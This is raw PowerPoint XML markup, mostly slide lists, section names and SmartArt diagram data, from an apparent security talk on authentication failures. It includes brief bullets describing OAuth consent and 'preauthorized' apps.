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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="322" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="324" r:id="rId4"/>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="323" r:id="rId8"/>
    <p:sldId id="289" r:id="rId9"/>
    <p:sldId id="280" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="295" r:id="rId14"/>
    <p:sldId id="314" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="291" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="296" r:id="rId19"/>
    <p:sldId id="298" r:id="rId20"/>
    <p:sldId id="320" r:id="rId21"/>
    <p:sldId id="299" r:id="rId22"/>
    <p:sldId id="263" r:id="rId23"/>
    <p:sldId id="302" r:id="rId24"/>
    <p:sldId id="301" r:id="rId25"/>
    <p:sldId id="304" r:id="rId26"/>
    <p:sldId id="305" r:id="rId27"/>
    <p:sldId id="313" r:id="rId28"/>
    <p:sldId id="321" r:id="rId29"/>
    <p:sldId id="315" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="317" r:id="rId32"/>
    <p:sldId id="316" r:id="rId33"/>
    <p:sldId id="325" r:id="rId34"/>
    <p:sldId id="307" r:id="rId35"/>
    <p:sldId id="309" r:id="rId36"/>
    <p:sldId id="273" r:id="rId37"/>
    <p:sldId id="31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842E6D63-3B55-43ED-ADB9-C62F155FD9CA}">
          <p14:sldIdLst>
            <p14:sldId id="322"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Identity Crisis: war stories from authentication failures " id="{33FA2D65-F4AA-4015-ABC6-EF6EF2609058}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="324"/>
            <p14:sldId id="277"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Agenda" id="{DC709D4E-F9EC-4765-9396-64203B92DF44}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="What is Identity?" id="{659CC069-342F-4CD4-88CB-C93447ED251A}">
          <p14:sldIdLst>
            <p14:sldId id="275"/>
            <p14:sldId id="323"/>
            <p14:sldId id="289"/>
            <p14:sldId id="280"/>
            <p14:sldId id="284"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="295"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Protocols and its Nightmares" id="{730B44AC-91A1-4970-ACEC-42205ADAD532}">
          <p14:sldIdLst>
            <p14:sldId id="314"/>
            <p14:sldId id="287"/>
            <p14:sldId id="291"/>
            <p14:sldId id="293"/>
            <p14:sldId id="296"/>
            <p14:sldId id="298"/>
            <p14:sldId id="320"/>
            <p14:sldId id="299"/>
            <p14:sldId id="263"/>
            <p14:sldId id="302"/>
            <p14:sldId id="301"/>
            <p14:sldId id="304"/>
            <p14:sldId id="305"/>
            <p14:sldId id="313"/>
            <p14:sldId id="321"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Shameless Plug" id="{8718B43A-238F-4F90-BB7B-A46ACD82C93C}">
          <p14:sldIdLst>
            <p14:sldId id="315"/>
            <p14:sldId id="308"/>
            <p14:sldId id="317"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusion" id="{943609DB-F941-4F1F-A475-305838A4D177}">
          <p14:sldIdLst>
            <p14:sldId id="316"/>
            <p14:sldId id="325"/>
            <p14:sldId id="307"/>
            <p14:sldId id="309"/>
            <p14:sldId id="273"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Questions" id="{C6DC87CD-DE02-414E-A926-AD7D6FF3AD05}">
          <p14:sldIdLst>
            <p14:sldId id="311"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="backup" id="{49AE05A1-334E-4F10-9687-E73CE893401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77888" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="477" y="39"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-223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9BC4A-3A03-4E27-8795-95630FD085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3171DE-C368-4D9A-9DF5-F4DEF7CBAE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What’s identity?</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23B13B41-A27A-4ED6-8F48-C60D57B32C70}" type="parTrans" cxnId="{3772BEE7-D4BB-4968-A134-BAA518731458}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6FC7BAF-767F-40FE-A0B8-69D67E2496C9}" type="sibTrans" cxnId="{3772BEE7-D4BB-4968-A134-BAA518731458}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C030B40-3D65-4437-AB9F-F1733008A4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Protocols and its nightmares</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E91547CC-72A4-441A-99C9-D4954B0543C8}" type="parTrans" cxnId="{07D34E28-267B-4EC9-AC9C-76AA70C61AF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFB53DB3-55C0-459D-B751-999BF7460861}" type="sibTrans" cxnId="{07D34E28-267B-4EC9-AC9C-76AA70C61AF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{776456D2-1B3E-4FA0-94A6-DD52AAA81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Identity Bounty</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BC8C9E8-4219-4EA9-8A0A-FFFD07F4F35E}" type="parTrans" cxnId="{03E36631-6F00-4D9E-9F17-6B773673D1AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B94DCB6F-3EA5-4A3E-A602-E47C90714C16}" type="sibTrans" cxnId="{03E36631-6F00-4D9E-9F17-6B773673D1AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F91E67D-F405-4BEB-8DA8-F773E7741E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CCC68E05-C4E4-4093-AFEE-3D98657FEEA7}" type="parTrans" cxnId="{2815E5E2-AFBF-4F56-850C-3E5736D907E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71A760C7-3A2E-442F-BC32-6A7E8AFF1289}" type="sibTrans" cxnId="{2815E5E2-AFBF-4F56-850C-3E5736D907E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" type="pres">
      <dgm:prSet presAssocID="{21A9BC4A-3A03-4E27-8795-95630FD0850F}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4462B813-A763-44D2-BEBB-68A83EB12BFD}" type="pres">
      <dgm:prSet presAssocID="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE7F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70947E08-D4F4-4C59-BFA9-51E626E17FF3}" type="pres">
      <dgm:prSet presAssocID="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE7F}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99138543-3606-471F-977E-0F98875809C3}" type="pres">
      <dgm:prSet presAssocID="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE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42A9E756-244A-4E07-93E1-5BEC8546F20B}" type="pres">
      <dgm:prSet presAssocID="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE7F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E8C7943-1184-4A6F-9D12-FDB22E88D4B0}" type="pres">
      <dgm:prSet presAssocID="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE7F}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93C6D9F9-5C45-4116-AFFA-2105F9C1FD19}" type="pres">
      <dgm:prSet presAssocID="{D6FC7BAF-767F-40FE-A0B8-69D67E2496C9}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E0F0C6E4-9C10-404B-B69F-B16C5547CB94}" type="pres">
      <dgm:prSet presAssocID="{4C030B40-3D65-4437-AB9F-F1733008A433}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51821A23-267C-41B0-AEB8-2907FECBFAA1}" type="pres">
      <dgm:prSet presAssocID="{4C030B40-3D65-4437-AB9F-F1733008A433}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C05036E-B599-4156-8E6F-ACE434DA8EDB}" type="pres">
      <dgm:prSet presAssocID="{4C030B40-3D65-4437-AB9F-F1733008A4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b"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{5FEA4231-E871-4963-BDCA-35407DE2A26A}" type="pres">
      <dgm:prSet presAssocID="{4C030B40-3D65-4437-AB9F-F1733008A433}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EC019A4-9F48-41AD-9E8A-CD461E10DD2D}" type="pres">
      <dgm:prSet presAssocID="{4C030B40-3D65-4437-AB9F-F1733008A433}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FF0CC25-4B58-41FC-9FE3-D1820982F820}" type="pres">
      <dgm:prSet presAssocID="{FFB53DB3-55C0-459D-B751-999BF7460861}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7EC13BC-D2EB-48A2-8F61-0171422012F0}" type="pres">
      <dgm:prSet presAssocID="{776456D2-1B3E-4FA0-94A6-DD52AAA81FA1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C454DA6-554D-41CF-9917-811D5F7D8BDE}" type="pres">
      <dgm:prSet presAssocID="{776456D2-1B3E-4FA0-94A6-DD52AAA81FA1}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA05C2D2-0E04-4A6C-81BC-DE74B5F824CD}" type="pres">
      <dgm:prSet presAssocID="{776456D2-1B3E-4FA0-94A6-DD52AAA81F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6574F6C-FE9B-4606-AF15-DF0DF45B12FE}" type="pres">
      <dgm:prSet presAssocID="{776456D2-1B3E-4FA0-94A6-DD52AAA81FA1}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64C1A3E7-9CF0-4B4E-9201-93EEA4AA9A1F}" type="pres">
      <dgm:prSet presAssocID="{776456D2-1B3E-4FA0-94A6-DD52AAA81FA1}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2F0306B-3AA9-466D-8ED0-E4264CDD5B5C}" type="pres">
      <dgm:prSet presAssocID="{B94DCB6F-3EA5-4A3E-A602-E47C90714C16}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F442C48-5A99-4BDB-8A3A-7F783B61E3F9}" type="pres">
      <dgm:prSet presAssocID="{6F91E67D-F405-4BEB-8DA8-F773E7741EAC}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{140A1319-E726-405F-B117-729E454CAFE4}" type="pres">
      <dgm:prSet presAssocID="{6F91E67D-F405-4BEB-8DA8-F773E7741EAC}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{503E4BD4-6FF9-4515-9C90-CD870C323301}" type="pres">
      <dgm:prSet presAssocID="{6F91E67D-F405-4BEB-8DA8-F773E7741E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DD4265F-79B2-4AA1-A8AA-34CBDC908B3F}" type="pres">
      <dgm:prSet presAssocID="{6F91E67D-F405-4BEB-8DA8-F773E7741EAC}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96FBB823-4F66-4FE7-9B14-7CA50C653A0D}" type="pres">
      <dgm:prSet presAssocID="{6F91E67D-F405-4BEB-8DA8-F773E7741E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7D34E28-267B-4EC9-AC9C-76AA70C61AF9}" srcId="{21A9BC4A-3A03-4E27-8795-95630FD0850F}" destId="{4C030B40-3D65-4437-AB9F-F1733008A433}" srcOrd="1" destOrd="0" parTransId="{E91547CC-72A4-441A-99C9-D4954B0543C8}" sibTransId="{FFB53DB3-55C0-459D-B751-999BF7460861}"/>
    <dgm:cxn modelId="{03E36631-6F00-4D9E-9F17-6B773673D1AE}" srcId="{21A9BC4A-3A03-4E27-8795-95630FD0850F}" destId="{776456D2-1B3E-4FA0-94A6-DD52AAA81FA1}" srcOrd="2" destOrd="0" parTransId="{2BC8C9E8-4219-4EA9-8A0A-FFFD07F4F35E}" sibTransId="{B94DCB6F-3EA5-4A3E-A602-E47C90714C16}"/>
    <dgm:cxn modelId="{EB10E8AB-2F89-457F-B8AA-1024EC72B5EC}" type="presOf" srcId="{4C030B40-3D65-4437-AB9F-F1733008A433}" destId="{9EC019A4-9F48-41AD-9E8A-CD461E10DD2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A8D890C0-B1A4-4A1E-BB23-565FE84DFD15}" type="presOf" srcId="{21A9BC4A-3A03-4E27-8795-95630FD0850F}" destId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{605C42CF-CD14-49FB-AC9D-5C31E46B3B68}" type="presOf" srcId="{776456D2-1B3E-4FA0-94A6-DD52AAA81FA1}" destId="{64C1A3E7-9CF0-4B4E-9201-93EEA4AA9A1F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1D2F3BD6-ACF8-49F6-96EC-7742AAD32AE0}" type="presOf" srcId="{6F91E67D-F405-4BEB-8DA8-F773E7741EAC}" destId="{96FBB823-4F66-4FE7-9B14-7CA50C653A0D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2815E5E2-AFBF-4F56-850C-3E5736D907E0}" srcId="{21A9BC4A-3A03-4E27-8795-95630FD0850F}" destId="{6F91E67D-F405-4BEB-8DA8-F773E7741EAC}" srcOrd="3" destOrd="0" parTransId="{CCC68E05-C4E4-4093-AFEE-3D98657FEEA7}" sibTransId="{71A760C7-3A2E-442F-BC32-6A7E8AFF1289}"/>
    <dgm:cxn modelId="{17F741E3-A98D-4E6E-95BA-577582D3495E}" type="presOf" srcId="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE7F}" destId="{6E8C7943-1184-4A6F-9D12-FDB22E88D4B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3772BEE7-D4BB-4968-A134-BAA518731458}" srcId="{21A9BC4A-3A03-4E27-8795-95630FD0850F}" destId="{6C3171DE-C368-4D9A-9DF5-F4DEF7CBAE7F}" srcOrd="0" destOrd="0" parTransId="{23B13B41-A27A-4ED6-8F48-C60D57B32C70}" sibTransId="{D6FC7BAF-767F-40FE-A0B8-69D67E2496C9}"/>
    <dgm:cxn modelId="{5B18EFD2-07E1-438F-A621-E21909DE7F45}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{4462B813-A763-44D2-BEBB-68A83EB12BFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{40E24F57-306B-4180-8F7B-5335A6306F46}" type="presParOf" srcId="{4462B813-A763-44D2-BEBB-68A83EB12BFD}" destId="{70947E08-D4F4-4C59-BFA9-51E626E17FF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{12826FFD-0421-4669-B6D1-9414A9D5DDCD}" type="presParOf" srcId="{4462B813-A763-44D2-BEBB-68A83EB12BFD}" destId="{99138543-3606-471F-977E-0F98875809C3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FB09DF9A-CB91-4076-97CF-0FEDC17C4C9E}" type="presParOf" srcId="{4462B813-A763-44D2-BEBB-68A83EB12BFD}" destId="{42A9E756-244A-4E07-93E1-5BEC8546F20B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B088A296-DA2C-4A56-BA8E-AFEC4638DA20}" type="presParOf" srcId="{4462B813-A763-44D2-BEBB-68A83EB12BFD}" destId="{6E8C7943-1184-4A6F-9D12-FDB22E88D4B0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{291F40CD-882A-41AD-81B9-B344625495F5}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{93C6D9F9-5C45-4116-AFFA-2105F9C1FD19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A981BAEC-6F9E-4A16-BEA1-89019518BFAF}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{E0F0C6E4-9C10-404B-B69F-B16C5547CB94}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7654D1E4-C37C-4DA0-8C2B-3DB9ED75D403}" type="presParOf" srcId="{E0F0C6E4-9C10-404B-B69F-B16C5547CB94}" destId="{51821A23-267C-41B0-AEB8-2907FECBFAA1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{CF0C16C6-1DF0-4E86-B350-3EF935AF14C3}" type="presParOf" srcId="{E0F0C6E4-9C10-404B-B69F-B16C5547CB94}" destId="{9C05036E-B599-4156-8E6F-ACE434DA8EDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{203B89A2-6E70-4B21-B665-03BB46B1F303}" type="presParOf" srcId="{E0F0C6E4-9C10-404B-B69F-B16C5547CB94}" destId="{5FEA4231-E871-4963-BDCA-35407DE2A26A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8214CFF5-791E-4B9E-98D4-B175BBCB0BD8}" type="presParOf" srcId="{E0F0C6E4-9C10-404B-B69F-B16C5547CB94}" destId="{9EC019A4-9F48-41AD-9E8A-CD461E10DD2D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DE0E905B-A9DE-48D4-87BE-02379EE840B0}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{7FF0CC25-4B58-41FC-9FE3-D1820982F820}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B7EE1505-FB04-46AC-BE95-8BB504CE55F4}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{E7EC13BC-D2EB-48A2-8F61-0171422012F0}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{CCDCFB40-C316-443B-A113-96D24F80ADBB}" type="presParOf" srcId="{E7EC13BC-D2EB-48A2-8F61-0171422012F0}" destId="{0C454DA6-554D-41CF-9917-811D5F7D8BDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{352541B2-47A5-4F1C-9CB3-1F40D34F3D65}" type="presParOf" srcId="{E7EC13BC-D2EB-48A2-8F61-0171422012F0}" destId="{DA05C2D2-0E04-4A6C-81BC-DE74B5F824CD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FB800578-4EE8-4E9B-A0EF-40B88B8152AC}" type="presParOf" srcId="{E7EC13BC-D2EB-48A2-8F61-0171422012F0}" destId="{06574F6C-FE9B-4606-AF15-DF0DF45B12FE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C46C704B-6DC7-4E6D-9062-A4493C493FA4}" type="presParOf" srcId="{E7EC13BC-D2EB-48A2-8F61-0171422012F0}" destId="{64C1A3E7-9CF0-4B4E-9201-93EEA4AA9A1F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0B77AB4D-4B65-4F26-B2F2-C5FEF4186B40}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{C2F0306B-3AA9-466D-8ED0-E4264CDD5B5C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B5192A79-5961-4083-AE7D-70DB361655E6}" type="presParOf" srcId="{023A76D1-55CB-4725-89AD-81F9CADB1741}" destId="{7F442C48-5A99-4BDB-8A3A-7F783B61E3F9}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5B811E93-025F-472C-9BA8-02F69141A6A8}" type="presParOf" srcId="{7F442C48-5A99-4BDB-8A3A-7F783B61E3F9}" destId="{140A1319-E726-405F-B117-729E454CAFE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6C35583C-E2FA-4412-B063-96D469F55AB9}" type="presParOf" srcId="{7F442C48-5A99-4BDB-8A3A-7F783B61E3F9}" destId="{503E4BD4-6FF9-4515-9C90-CD870C323301}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D09FA0D7-ED8F-4406-9DF0-59F2DA508DFA}" type="presParOf" srcId="{7F442C48-5A99-4BDB-8A3A-7F783B61E3F9}" destId="{3DD4265F-79B2-4AA1-A8AA-34CBDC908B3F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{40749329-6DEC-4B23-BFB6-81CF80E7164A}" type="presParOf" srcId="{7F442C48-5A99-4BDB-8A3A-7F783B61E3F9}" destId="{96FBB823-4F66-4FE7-9B14-7CA50C653A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36EACC-40A0-467F-8E0A-C2900A1A4F1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78AD31-3DD7-454E-BE08-FE28C54A0E3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>1: Some app requests Oauth access to a user's account </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FAA03EF-965D-4F56-B24F-645DCCDA7713}" type="parTrans" cxnId="{5F04762A-6032-4635-A9C6-2AF68BD44912}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2439BAE7-E48D-48E5-B968-6DE28C462B81}" type="sibTrans" cxnId="{5F04762A-6032-4635-A9C6-2AF68BD44912}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7179F809-BE81-49E6-80BC-C49128CA7CE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>2: User approves or rejects </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E5C8EE9-618D-4B30-BE13-584C1EF547AC}" type="parTrans" cxnId="{1900787F-CE9A-4827-9F5D-3219EF9F967E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00EEA71D-B98C-4418-92CD-10977E881166}" type="sibTrans" cxnId="{1900787F-CE9A-4827-9F5D-3219EF9F967E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1F8DFDC-7BCB-41BB-AF43-408135C08E50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Some apps are “preauthorized”</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{681B0733-4880-4468-A644-B22AF7EC65FA}" type="parTrans" cxnId="{91270DC6-001A-486D-AEB5-EF3C73BF2F75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6498093-673E-4338-A4DE-460C9A4DAF8B}" type="sibTrans" cxnId="{91270DC6-001A-486D-AEB5-EF3C73BF2F75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
